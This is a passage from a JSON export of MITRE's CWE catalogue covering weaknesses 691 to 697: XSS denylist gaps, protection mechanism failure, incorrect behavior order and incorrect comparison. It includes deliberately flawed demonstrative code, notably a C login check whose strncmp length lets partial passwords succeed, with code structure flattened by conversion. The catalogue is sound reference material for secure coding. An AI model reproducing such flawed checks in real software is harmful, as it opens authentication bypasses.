Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Modes_of_Introduction, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships, Relevant_Properties, Taxonomy_Mappings, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples, Relationships"}]}},"691":{"attr":{"@_ID":"691","@_Name":"Insufficient Control Flow Management","@_Abstraction":"Pillar","@_Structure":"Simple","@_Status":"Draft"},"Description":"The code does not sufficiently manage its control flow during execution, creating conditions in which the control flow can be modified in unexpected ways.","Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Alter Execution Logic"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":40,"Entry_Name":"Insufficient Process Validation"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"29"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-04-11"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Maintenance_Notes, Other_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Relevant_Properties"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes"}]}},"692":{"attr":{"@_ID":"692","@_Name":"Incomplete Denylist to Cross-Site Scripting","@_Abstraction":"Compound","@_Structure":"Chain","@_Status":"Draft"},"Description":"The product uses a denylist-based protection mechanism to defend against XSS attacks, but the denylist is incomplete, allowing XSS variants to succeed.","Extended_Description":"While XSS might seem simple to prevent, web browsers vary so widely in how they parse web pages, that a denylist cannot keep track of all the variations. The \\"XSS Cheat Sheet\\" [REF-714] contains a large number of attacks that are intended to bypass incomplete denylists.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"StartsWith","@_CWE_ID":"184","@_View_ID":"709","@_Chain_ID":"692"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"79","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Code or Commands"}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2007-5727","Description":"Denylist only removes &lt;SCRIPT&gt; tag.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5727"},{"Reference":"CVE-2006-3617","Description":"Denylist only removes &lt;SCRIPT&gt; tag.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3617"},{"Reference":"CVE-2006-4308","Description":"Denylist only checks \\"javascript:\\" tag","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4308"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"120"}},{"attr":{"@_CAPEC_ID":"267"}},{"attr":{"@_CAPEC_ID":"71"}},{"attr":{"@_CAPEC_ID":"80"}},{"attr":{"@_CAPEC_ID":"85"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-714"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-04-11"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-24","Modification_Comment":"added Language_Class \\"All\\""},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Applicable_Platforms, Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships, Relevant_Properties"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Description, Name, Observed_Examples, References"}],"Previous_Entry_Name":{"#text":"Incomplete Blacklist to Cross-Site Scripting","attr":{"@_Date":"2020-02-26"}}}},"693":{"attr":{"@_ID":"693","@_Name":"Protection Mechanism Failure","@_Abstraction":"Pillar","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product does not use or incorrectly uses a protection mechanism that provides sufficient defense against directed attacks against the product.","Extended_Description":"This weakness covers three distinct situations. A \\"missing\\" protection mechanism occurs when the application does not define any mechanism against a certain class of attack. An \\"insufficient\\" protection mechanism might provide some defenses - for example, against the most common attacks - but it does not protect against everything that is intended. Finally, an \\"ignored\\" mechanism occurs when a mechanism is available and in active use within the product, but the developer has not applied it in some code path.","Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"1"}},{"attr":{"@_CAPEC_ID":"107"}},{"attr":{"@_CAPEC_ID":"127"}},{"attr":{"@_CAPEC_ID":"17"}},{"attr":{"@_CAPEC_ID":"20"}},{"attr":{"@_CAPEC_ID":"22"}},{"attr":{"@_CAPEC_ID":"237"}},{"attr":{"@_CAPEC_ID":"36"}},{"attr":{"@_CAPEC_ID":"477"}},{"attr":{"@_CAPEC_ID":"480"}},{"attr":{"@_CAPEC_ID":"51"}},{"attr":{"@_CAPEC_ID":"57"}},{"attr":{"@_CAPEC_ID":"59"}},{"attr":{"@_CAPEC_ID":"65"}},{"attr":{"@_CAPEC_ID":"668"}},{"attr":{"@_CAPEC_ID":"74"}},{"attr":{"@_CAPEC_ID":"87"}}]},"Notes":{"Note":{"#text":"The concept of protection mechanisms is well established, but protection mechanism failures have not been studied comprehensively. It is suspected that protection mechanisms can have significantly different types of weaknesses than the weaknesses that they are intended to prevent.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-04-11"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Maintenance_Notes, Other_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Related_Attack_Patterns, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns"}]}},"694":{"attr":{"@_ID":"694","@_Name":"Use of Multiple Resources with Duplicate Identifier","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses multiple resources that can have the same identifier, in a context in which unique identifiers are required.","Extended_Description":"If the software assumes that each resource has a unique identifier, the software could operate on the wrong resource if attackers can cause multiple resources to be associated with the same identifier.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"99","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"573","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":[{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Note":"If unique identifiers are assumed when protecting sensitive resources, then duplicate identifiers might allow attackers to bypass the protection."},{"Scope":"Other","Impact":"Quality Degradation"}]},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Where possible, use unique identifiers. If non-unique identifiers are detected, then do not operate any resource with a non-unique identifier and report the error appropriately."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2013-4787","Description":"chain: mobile OS verifies cryptographic signature of file in an archive, but then installs a different file with the same name that is also listed in the archive.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4787"}},"Notes":{"Note":{"#text":"This weakness is probably closely associated with other issues related to doubling, such as CWE-675 (Duplicate Operations on Resource). It\'s often a case of an API contract violation (CWE-227).","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-09-09","Submission_Comment":"Note: this date reflects when the entry was first published. Draft versions of this entry were provided to members of the CWE community and modified between Draft 9 and 1.0."},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Description, Observed_Examples, Other_Notes, Potential_Mitigations, Relationship_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relevant_Properties"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"695":{"attr":{"@_ID":"695","@_Name":"Use of Low-Level Functionality","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses low-level functionality that is explicitly prohibited by the framework or specification under which the software is supposed to operate.","Extended_Description":"The use of low-level functionality can violate the specification in unexpected ways that effectively disable built-in protection mechanisms, introduce exploitable inconsistencies, or otherwise expose the functionality to attack.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"573","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Other"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"36"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-09-09","Submission_Comment":"Note: this date reflects when the entry was first published. Draft versions of this entry were provided to members of the CWE community and modified between Draft 9 and 1.0."},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"696":{"attr":{"@_ID":"696","@_Name":"Incorrect Behavior Order","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product performs multiple related behaviors, but the behaviors are performed in the wrong order in ways which may produce resultant weaknesses.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"691","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Alter Execution Logic"}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2019-9805","Description":"Chain: Creation of the packet client occurs before initialization is complete (CWE-696) resulting in a read from uninitialized memory (CWE-908), causing memory corruption.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9805"},{"Reference":"CVE-2007-5191","Description":"file-system management programs call the setuid and setgid functions in the wrong order and do not check the return values, allowing attackers to gain unintended privileges","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5191"},{"Reference":"CVE-2007-1588","Description":"C++ web server program calls Process::setuid before calling Process::setgid, preventing it from dropping privileges, potentially allowing CGI programs to be called with higher privileges than intended","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1588"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"POS36-C","Entry_Name":"Observe correct revocation order while relinquishing privileges","Mapping_Fit":"CWE More Abstract"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"463"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-09-09"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Description, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Observed_Examples"}]}},"697":{"attr":{"@_ID":"697","@_Name":"Incorrect Comparison","@_Abstraction":"Pillar","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software compares two entities in a security-relevant context, but the comparison is incorrect, which may lead to resultant weaknesses.","Extended_Description":{"xhtml:p":"This weakness class covers several possibilities:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ol":{"xhtml:li":["the comparison checks one factor incorrectly;","the comparison should consider multiple factors, but it does not check some of those factors at all;","the comparison checks the wrong factor."]}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Varies by Context"}},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-115"},"Intro_Text":"Consider an application in which Truck objects are defined to be the same if they have the same make, the same model, and were manufactured in the same year.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class Truck {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"private String make;private String model;private int year;public boolean equals(Object o) {}","xhtml:br":["","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (o == null) return false;if (o == this) return true;if (!(o instanceof Truck)) return false;Truck t = (Truck) o;return (this.make.equals(t.getMake()) &amp;&amp; this.model.equals(t.getModel()));","xhtml:br":["","","","","",""]}}}}}},"Body_Text":"Here, the equals() method only checks the make and model of the Truck objects, but the year of manufacture is not included."},{"attr":{"@_Demonstrative_Example_ID":"DX-116"},"Intro_Text":"This example defines a fixed username and password. The AuthenticateUser() function is intended to accept a username and a password from an untrusted user, and check to ensure that it matches the username and password. If the username and password match, AuthenticateUser() is intended to indicate that authentication succeeded.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char *username = \\"admin\\";char *pass = \\"password\\";int AuthenticateUser(char *inUser, char *inPass) {}int main (int argc, char **argv) {}","xhtml:i":"/* Ignore CWE-259 (hard-coded password) and CWE-309 (use of password system for authentication) for this example. */","xhtml:br":["","","","","","",""],"xhtml:div":[{"#text":"if (strncmp(username, inUser, strlen(inUser))) {}if (! strncmp(pass, inPass, strlen(inPass))) {}else {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"logEvent(\\"Auth failure of username using strlen of inUser\\");return(AUTH_FAIL);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"logEvent(\\"Auth success of password using strlen of inUser\\");return(AUTH_SUCCESS);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"logEvent(\\"Auth fail of password using sizeof\\");return(AUTH_FAIL);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}],"xhtml:br":["",""]},{"#text":"int authResult;if (argc &lt; 3) {}authResult = AuthenticateUser(argv[1], argv[2]);if (authResult == AUTH_SUCCESS) {}else {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","",""],"xhtml:div":[{"#text":"ExitError(\\"Usage: Provide a username and password\\");","attr":{"@_style":"margin-left:10px;"}},{"#text":"DoAuthenticatedTask(argv[1]);","attr":{"@_style":"margin-left:10px;"}},{"#text":"ExitError(\\"Authentication failed\\");","attr":{"@_style":"margin-left:10px;"}}]}]}},{"attr":{"@_Nature":"attack"},"xhtml:div":{"#text":"ppapaspass","xhtml:br":["","",""]}}],"Body_Text":["In AuthenticateUser(), the strncmp() call uses the string length of an attacker-provided inPass parameter in order to determine how many characters to check in the password. So, if the attacker only provides a password of length 1, the check will only examine the first byte of the application\'s password before determining success.","As a result, this partial comparison leads to improper authentication (CWE-287).","Any of these passwords would still cause authentication to succeed for the \\"admin\\" user:","This significantly reduces the search space for an attacker, making brute force attacks more feasible.","The same problem also applies to the username, so values such as \\"a\\" and \\"adm\\" will succeed for the username.","While this demonstrative example may not seem realistic, see the Observed Examples for CVE entries that effectively reflect this same weakness."]}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2016-10003","Description":"Proxy performs incorrect comparison of request headers, leading to 